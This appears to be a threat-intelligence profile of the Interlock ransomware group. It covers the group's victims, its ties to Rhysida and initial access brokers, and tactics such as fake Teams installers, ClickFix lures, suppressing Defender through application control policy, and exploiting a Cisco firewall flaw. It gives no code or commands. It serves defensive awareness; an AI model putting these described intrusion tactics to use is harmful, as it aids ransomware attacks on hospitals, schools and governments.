Interlock

Interlock is a financially motivated ransomware group, tracked internally by IBM X-Force as Hive0163, that has been running ransomware campaigns since September 2024. Reporting in the provided content describes Interlock as targeting healthcare and other critical infrastructure, as well as education, local government/administration, and other large organizations in North America and Europe. Multiple examples in the content attribute or associate Interlock with attacks affecting DaVita, Kettering Health, Goodwill Industries International, Lexington-Richland School District Five, West Lothian Council, and Texas Tech University Health Sciences Center. The group is described as particularly active against education organizations, with one report stating that 27.3% of its total victims were in that sector, well above the broader ransomware average. Other reporting says Interlock historically targeted education, engineering, architecture, construction, manufacturing, industrial, healthcare, government, and public sector organizations. Interlock has been linked to the TAG-124 / KongTuke / Woodgnat traffic distribution and initial access ecosystem. The content states that KongTuke/Woodgnat acts as an initial access broker selling access to ransomware groups including Interlock, and that Interlock also uses or benefits from TAG-124 traffic distribution services. Interlock has also been associated with malware and tooling overlaps involving Rhysida. IBM X-Force reported strong connections between Interlock and Rhysida, including shared use of the Supper backdoor (also known as SocksShell or WINDYTWIST), similarities between Supper, InterlockRAT, NodeSnake, JunkFiction, and ModeloRAT, and likely overlapping developers or trusted code sharing. Cisco Talos was cited as previously assessing with low confidence that Interlock may have emerged from Rhysida operators or developers. Tactics and techniques directly mentioned in the content include use of trojanized software installers, fake Microsoft Teams download pages, traffic distribution systems, ClickFix-style lures, and fake browser updates for initial access and payload delivery. Interlock has been repeatedly linked to TAG-124, also tracked as LandUpdate808. IBM also reported methodical post-compromise activity including credential theft, use of AZcopy and Advanced Port Scanner, and a custom Windows Defender Application Control policy on Interlock staging servers designed to suppress Defender and endpoint protections. Amazon threat intelligence reported that Interlock exploited CVE-2026-20131 in Cisco Secure Firewall Management Center beginning on January 26, 2026, 36 days before public disclosure, and also noted use of ConnectWise ScreenConnect, Certify, Volatility, custom JavaScript and Java remote access trojans, a fileless Java memory-resident backdoor, and PowerShell-based reconnaissance. The content also notes that Interlock shares similarities with Rhysida in tactics, tools, and encryption behaviors, but the exact relationship is described as unknown. Interlock is not described in the provided content as a nation-state actor.